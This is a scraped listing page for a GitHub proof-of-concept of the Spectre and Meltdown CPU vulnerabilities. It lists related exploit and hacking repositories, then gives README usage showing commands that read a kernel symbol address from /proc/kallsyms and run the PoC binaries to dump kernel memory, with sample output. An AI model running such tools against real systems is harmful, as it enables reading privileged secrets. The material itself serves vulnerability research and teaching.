Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details

All Projects → mniip → Spectre Meltdown Poc

mniip / Spectre Meltdown Poc

A semi-demi-working proof of concept for a mix of spectre and meltdown vulnerabilities

Programming Languages

50402 projects - #5 most used programming language

Labels

exploit vulnerability proof-of-concept spectre

Projects that are alternatives of or similar to Spectre Meltdown Poc

Poc

Proofs-of-concept

Stars: ✭ 467 (+267.72%)

Mutual labels: exploit, vulnerability, proof-of-concept

Slowloris

Asynchronous Python implementation of SlowLoris DoS attack

Stars: ✭ 51 (-59.84%)

Mutual labels: exploit, vulnerability

Labs

Vulnerability Labs for security analysis

Stars: ✭ 1,002 (+688.98%)

Mutual labels: exploit, vulnerability

Safiler

Safari local file reader

Stars: ✭ 118 (-7.09%)

Mutual labels: exploit, vulnerability

Spectre Attack

Example of using revealed "Spectre" exploit (CVE-2017-5753 and CVE-2017-5715)

Stars: ✭ 690 (+443.31%)

Mutual labels: exploit, spectre

V3n0m Scanner

Popular Pentesting scanner in Python3.6 for SQLi/XSS/LFI/RFI and other Vulns

Stars: ✭ 847 (+566.93%)

Mutual labels: exploit, vulnerability

Hacker ezines

A collection of electronic hacker magazines carefully curated over the years from multiple sources

Stars: ✭ 72 (-43.31%)

Mutual labels: exploit, vulnerability

Ysoserial

A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

Stars: ✭ 4,808 (+3685.83%)

Mutual labels: exploit, vulnerability

Thoron

Thoron Framework is a Linux post-exploitation framework that exploits Linux TCP vulnerability to provide a shell-like connection. Thoron Framework has the ability to create simple payloads to provide Linux TCP attack.

Stars: ✭ 87 (-31.5%)

Mutual labels: exploit, vulnerability

Reverse Shell

Reverse Shell as a Service

Stars: ✭ 1,281 (+908.66%)

Mutual labels: exploit, vulnerability

Jscpwn

PoC exploit for CVE-2016-4622

Stars: ✭ 89 (-29.92%)

Mutual labels: exploit, vulnerability

Herpaderping

Process Herpaderping proof of concept, tool, and technical deep dive. Process Herpaderping bypasses security products by obscuring the intentions of a process.

Stars: ✭ 614 (+383.46%)

Mutual labels: exploit, vulnerability

Hack Tools

hack tools

Stars: ✭ 488 (+284.25%)

Mutual labels: exploit, vulnerability

Cve 2017 0065

Exploiting Edge's read:// urlhandler

Stars: ✭ 15 (-88.19%)

Mutual labels: exploit, vulnerability

Ansvif

A Not So Very Intelligent Fuzzer: An advanced fuzzing framework designed to find vulnerabilities in C/C++ code.

Stars: ✭ 107 (-15.75%)

Mutual labels: exploit, vulnerability

Sap exploit

Here you can get full exploit for SAP NetWeaver AS JAVA

Stars: ✭ 60 (-52.76%)

Mutual labels: exploit, vulnerability

Meltdown

This repository contains several applications, demonstrating the Meltdown bug.

Stars: ✭ 3,931 (+2995.28%)

Mutual labels: exploit, proof-of-concept

Hardware And Firmware Security Guidance

Guidance for the Spectre, Meltdown, Speculative Store Bypass, Rogue System Register Read, Lazy FP State Restore, Bounds Check Bypass Store, TLBleed, and L1TF/Foreshadow vulnerabilities as well as general hardware and firmware security guidance. #nsacyber

Stars: ✭ 408 (+221.26%)

Mutual labels: vulnerability, spectre

In Spectre Meltdown

This tool allows to check speculative execution side-channel attacks that affect many modern processors and operating systems designs. CVE-2017-5754 (Meltdown) and CVE-2017-5715 (Spectre) allows unprivileged processes to steal secrets from privileged processes. These attacks present 3 different ways of attacking data protection measures on CPUs enabling attackers to read data they shouldn't be able to. This tool is originally based on Microsoft: https://support.microsoft.com/en-us/help/4073119/protect-against-speculative-execution-side-channel-vulnerabilities-in

Stars: ✭ 86 (-32.28%)

Mutual labels: vulnerability, spectre

H4cker

This repository is primarily maintained by Omar Santos and includes thousands of resources related to ethical hacking / penetration testing, digital forensics and incident response (DFIR), vulnerability research, exploit development, reverse engineering, and more.

Stars: ✭ 10,451 (+8129.13%)

Mutual labels: exploit, vulnerability

View All Similar Projects ➔

Spectre and Meltdown Proof-of-Concept

Read kernel addresses by stalling the pipeline and speculatively hitting a cacheline:

$ make
...
$ grep ' sys_call_table' /proc/kallsyms
ffffffff8f800180 R sys_call_table
$ ./poc ffffffff8f800180
0xffffffff8f800180 | 10 40 23 8f ff ff ff ff d0 40 23 8f ff ff ff ff
0xffffffff8f800190 | c0 14 23 8f ff ff ff ff 60 f6 22 8f ff ff ff ff
0xffffffff8f8001a0 | 40 91 23 8f ff ff ff ff 70 91 23 8f ff ff ff ff
0xffffffff8f8001b0 | 50 91 23 8f ff ff ff ff 10 af 24 8f ff ff ff ff
...

Read kernel addresses by poisoning the branch predictor and speculatively hitting a cacheline:

$ ./poc_poison ffffffff8f800180
cutoff: 192
0xffffffff8f800180 | 10 40 23 8f ff ff ff ff d0 40 23 8f ff ff ff ff
...

Visualize memory read timings:

$ ./poc_vis ffffffff8f800180

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].

Stars: ✭ 127

Visit Git Page 🔗Visit User Page 🔗Visit Issues Page (5) 🔗